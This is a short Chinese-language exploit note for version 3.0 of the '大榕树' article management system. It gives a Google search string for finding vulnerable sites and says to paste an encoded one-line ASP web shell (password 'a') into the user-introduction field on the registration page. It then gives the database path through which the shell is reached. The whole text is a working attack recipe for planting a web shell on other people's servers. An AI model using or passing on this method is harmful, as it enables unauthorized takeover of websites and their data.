大榕树网络文章管理系统 Ver 3.0 Build 090602 用户注册处过滤不严 可插入一句话
利用:Google:inurl:ArtClaShow.asp?cid ( 搜索 inurl:ArtClaShow.asp?cid 获得大约 1,170 条查询结果,以下是第 1-10 条)
打开网页,找到注册新用户 或者直接跳到UserReg.asp页面,在用户介绍处插入一句话 ┼攠數畣整爠煥敵瑳∨≡┩愾 ,其他按要求输入
如果看到注册成功,等待管理员审核,不用管,连接数据库即可。貌似现在流行这样插。密码 a
数据库地址:data/admin_article.asp
